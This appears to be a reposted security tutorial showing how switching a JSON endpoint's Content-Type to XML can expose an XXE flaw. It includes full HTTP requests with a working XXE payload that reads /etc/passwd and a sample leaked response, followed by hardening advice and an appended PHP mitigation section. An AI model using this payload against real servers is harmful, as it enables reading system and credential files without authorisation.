[Repost] Playing with Content-Type – XXE on JSON Endpoints

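This article explores how converting a JSON request to XML can reach a weakly configured XML parser on the server and enable XXE attacks. By changing the Content-Type header, an attacker can resubmit an originally JSON request as XML and exploit inconsistencies in how the server handles different data formats, reading from the server's file system or making remote connections. The article walks through the attack, including XML document structure, DOCTYPE definitions, and how to construct a valid XML payload that triggers XXE. It also suggests mitigations, such as disabling XML parsing or adjusting the server configuration.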


Original article:

Many web and mobile applications rely on web services communication for client-server interaction. The most common data formats for web services are XML, whether SOAP or RESTful, and JSON. While a web service may be programmed to use just one of them, the server may accept data formats that the developers did not anticipate. This may result in JSON endpoints being vulnerable to XML External Entity attacks (XXE), an attack that exploits weakly configured XML parser settings on the server.

XXE is a well-known attack against XML endpoints. To exploit it, external entity declarations are included in the XML payload, and the server expands the entities, potentially resulting in read access to the web server’s file system, remote file system access via UNC paths, or connections to arbitrary hosts over HTTP/HTTPS. XXE attacks rely on inline DOCTYPE definitions in the XML payload. In the following example, an external entity pointing to the /etc/passwd file on the web server is declared and the entity is included in the XML payload:

[quote]<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
[some xml content..]
<element>&xxe;</element>
[some xml content..][/quote]
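To make the expansion step concrete, here is a minimal Python sketch that uses a harmless internal entity rather than an external one. The entity name `greeting`, the sample document and the helper `expanded_text` are made up for illustration. The standard-library `xml.etree.ElementTree` parser is used only to show that the parser substitutes the entity's replacement text before the application sees the element content.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample document: an inline DOCTYPE declares an INTERNAL entity.
# An XXE payload has the same shape but declares the entity with SYSTEM "file:///...".
DOC = (
    '<!DOCTYPE netspi [<!ENTITY greeting "hello from the DTD">]>'
    "<element>&greeting;</element>"
)


def expanded_text(xml_text: str) -> str:
    """Parse the document and return the root element's text after expansion."""
    return ET.fromstring(xml_text).text or ""


if __name__ == "__main__":
    print(expanded_text(DOC))
```

The application never sees the literal `&greeting;`, only the replacement text. With an external entity and a permissive parser, that replacement text would be the contents of the referenced file, which is why it can end up echoed in a response.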
It’s a simple and neat attack. Time to play with the Content-Type header and HTTP request payloads to see if this could be exploited against JSON endpoints as well. A sample JSON request is listed below, with the Content-Type set to application/json (with silly sample data and most HTTP headers removed):
[quote]
HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/json
Content-Length: 38

{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name netspitest"}[/quote]
If the Content-Type header is changed to application/xml instead, the client is telling the server that the POST payload is XML formatted data. But if it’s not, the server will not be able to parse it and may display an error similar to the following:

[quote]HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 38

{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 127

{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}[/quote]
The error indicates that the server is able to process XML formatted data as well as JSON formatted data, but because the data wasn’t actually XML as stated in the Content-Type header, it cannot be parsed. To overcome this, the JSON has to be converted to XML. There are multiple online tools for that, and Eric Gruber created a Burp plugin to automate the conversion in Burp (Content-Type Converter).
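The reasoning above can be turned into a rough triage helper. The sketch below is hypothetical: the function name `classify_probe`, the hint strings and the three labels are assumptions chosen to match the sample error, not a complete list of what real servers return. The 415 check relies only on the standard HTTP status for an unsupported media type.

```python
# Assumed substrings suggesting that an XML parser handled the request body.
XML_PARSER_HINTS = ("SAXParseException", "XML document structures", "xml.sax")


def classify_probe(status: int, body: str) -> str:
    """Roughly triage the response to a request re-labelled as application/xml."""
    if status == 415:
        return "rejected"            # the server refused the declared media type
    if any(hint in body for hint in XML_PARSER_HINTS):
        return "xml-parser-reached"  # the body was handed to an XML parser
    return "inconclusive"            # no evidence either way
```

A result of `xml-parser-reached` only means the conversion step is worth trying; it says nothing yet about whether entities are expanded.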

[quote]Original JSON

{"search":"name","value":"netspitest"}

XML Conversion

<?xml version="1.0" encoding="UTF-8" ?>
<search>name</search>
<value>netspitest</value>[/quote]
However, this straight conversion results in an invalid XML document, because it lacks the single root element that well-formed XML requires. If the invalid XML is sent to the server, the server will sometimes respond with an error message stating what kind of root element was expected, along with the namespace. Otherwise, the best guess is to add a root element <root>, which makes the XML well-formed.

[quote]<?xml version="1.0" encoding="UTF-8" ?>
<root>
<search>name</search>
<value>netspitest</value>
</root>[/quote]
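The conversion and the root-element fix can be sketched in a few lines of Python. This is an illustration, not the Burp plugin's implementation: the function name `json_to_xml` and the default root name `root` are assumptions, and the sketch handles only a flat JSON object whose keys are valid XML element names.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(json_text: str, root_name: str = "root") -> str:
    """Wrap a flat JSON object in a single root element and serialize it."""
    data = json.loads(json_text)
    if not isinstance(data, dict):
        raise ValueError("this sketch only handles a top-level JSON object")
    root = ET.Element(root_name)
    for key, value in data.items():
        child = ET.SubElement(root, key)  # assumes the key is a valid XML name
        child.text = str(value)
    body = ET.tostring(root, encoding="unicode")
    return '<?xml version="1.0" encoding="UTF-8" ?>\n' + body


if __name__ == "__main__":
    print(json_to_xml('{"search":"name","value":"netspitest"}'))
```

If the server's error message names the root element it expects, pass that name as `root_name` instead of guessing.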
Now the original JSON request can be sent as XML and the server may return a valid response:

[quote]HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 112

<?xml version="1.0" encoding="UTF-8" ?>
<root>
<search>name</search>
<value>netspitest</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name netspitest"}[/quote]
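For readers who script their testing, the request above can be prepared with Python's standard library. This sketch only builds the request object and does not send it. The helper name `build_xml_request` is hypothetical, and the `http://` scheme in the usage line is an assumption, since the original shows only the host and path.

```python
import urllib.request


def build_xml_request(url: str, xml_body: str) -> urllib.request.Request:
    """Prepare (but do not send) a POST whose body is labelled as XML."""
    data = xml_body.encode("utf-8")
    return urllib.request.Request(
        url,
        data=data,
        method="POST",
        headers={
            "Accept": "application/json",        # still ask for a JSON response
            "Content-Type": "application/xml",   # the only change from the JSON request
            "Content-Length": str(len(data)),    # byte length of the encoded body
        },
    )


if __name__ == "__main__":
    req = build_xml_request(
        "http://someserver.netspi.com/netspi",  # scheme assumed for illustration
        '<?xml version="1.0" encoding="UTF-8" ?>\n<root><search>name</search></root>',
    )
    print(req.get_method(), req.full_url, req.header_items())
```

Keeping `Accept: application/json` mirrors the sample request: only the declared type of the request body changes.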
As the server accepts XML input, XXE can be exploited against a JSON endpoint.

[quote]HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467

{"error": "no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....[/quote]
Obviously, not every JSON endpoint accepts XML; changing the Content-Type header may have no effect, or it may result in a 415 Unsupported Media Type error. On the other hand, JSON to XML attacks are not limited to POST payloads with JSON content. I have seen this work on JSON formatted GET and POST parameters as well. If the JSON parameter is converted and sent as XML, the server will guess what the content type is.
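The 415 case corresponds to a server that checks the declared media type before choosing a parser. A minimal sketch of such a check follows, assuming a JSON-only endpoint; the names `ALLOWED_MEDIA_TYPES` and `status_for_content_type` are hypothetical and not tied to any particular framework.

```python
from typing import Optional

# Assumption: this endpoint is meant to accept JSON and nothing else.
ALLOWED_MEDIA_TYPES = {"application/json"}


def status_for_content_type(header_value: Optional[str]) -> int:
    """Return 415 unless the declared media type is explicitly allowed."""
    if not header_value:
        return 415
    # Drop parameters such as "; charset=utf-8" and normalise case.
    media_type = header_value.split(";", 1)[0].strip().lower()
    return 200 if media_type in ALLOWED_MEDIA_TYPES else 415
```

An explicit allowlist avoids the situation described above, where the server guesses the content type and silently hands the body to an XML parser.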

So, to harden a JSON endpoint, XML parsing should be disabled altogether and/or inline DOCTYPE declarations should be disabled to prevent XML external entity injections.
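Where XML input cannot be turned off entirely, one way to refuse inline DOCTYPE declarations is to abort parsing as soon as one appears. The sketch below uses Python's standard-library expat bindings. The names `DoctypeForbidden` and `parse_without_doctype` are hypothetical, and a real service would combine this check with its normal parsing rather than discard the parse result.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document carries any DOCTYPE declaration."""


def parse_without_doctype(xml_bytes: bytes) -> None:
    """Parse XML with expat, aborting as soon as a DOCTYPE is seen."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires at the start of the DOCTYPE, before any entity is referenced.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)  # True marks this as the final chunk
```

Rejecting the whole document is stricter than disabling external entities alone, but a JSON-derived payload has no legitimate reason to carry a DOCTYPE.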
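### XXE Vulnerabilities in the Pikachu-Master Project

#### Overview of mitigations

For the XML External Entity (XXE) vulnerability in the Pikachu-Master project, the main defenses focus on keeping malicious input away from the parser and on restricting access to external resources. Specifically:

- **Disable external entity expansion**: configure the XML parsing library used by the application so that it does not load DTD entity declarations from external sources[^3].
- **Validate and sanitize user input**: make sure all XML received from users passes strict schema validation or allowlist filtering, so that potentially dangerous characters and structures are rejected.
- **Follow secure coding practices**: follow OWASP's secure development guidance, and pay particular attention to injection risks when writing modules that perform file operations, network requests, and similar functions.

#### Implementation details

For PHP applications, `libxml_disable_entity_loader(true)` turns off external entity loading. The call should be made as early as possible so that it covers all XML parsing during the application's lifetime[^4]. Note that this function is deprecated as of PHP 8.0, because libxml 2.9.0 and later disable external entity loading by default; on those versions, the main point is not to re-enable entity substitution with the `LIBXML_NOENT` flag.

Another approach is to preprocess submitted content on the server and remove DOCTYPE declarations that are not needed. The following code shows how a regular expression can do this. Pattern-based stripping is easy to get wrong, so treat it as a supplement to parser configuration rather than a replacement:

```php
<?php
// Strip a DOCTYPE declaration, including an optional internal subset [...].
// The input must not be HTML-escaped first, or "<!DOCTYPE" would never match.
function sanitize_xml(string $input): string {
    $pattern = '/<!DOCTYPE[^>\[]*(?:\[.*?\]\s*)?>/is';
    // preg_replace() returns null on error; fall back to an empty string.
    return preg_replace($pattern, '', $input) ?? '';
}
?>
```

In addition, consider [XMLReader](https://www.php.net/manual/en/book.xmlreader.php), a bundled PHP extension that offers finer-grained control and can read large XML documents without loading them entirely into memory. Substituting [DOMDocument::loadHTML()](https://www.php.net/manual/en/domdocument.loadhtml.php) for the plain load function is sometimes suggested as well, but loadHTML() parses HTML rather than XML, so it is not a drop-in replacement for XML input.

#### Prevention recommendations

To further reduce the likelihood of such attacks, developers should regularly review dependencies for known vulnerabilities and update them promptly, keep good logging habits so that anomalies can be handled quickly, and, most importantly, strengthen Web security awareness training within the team.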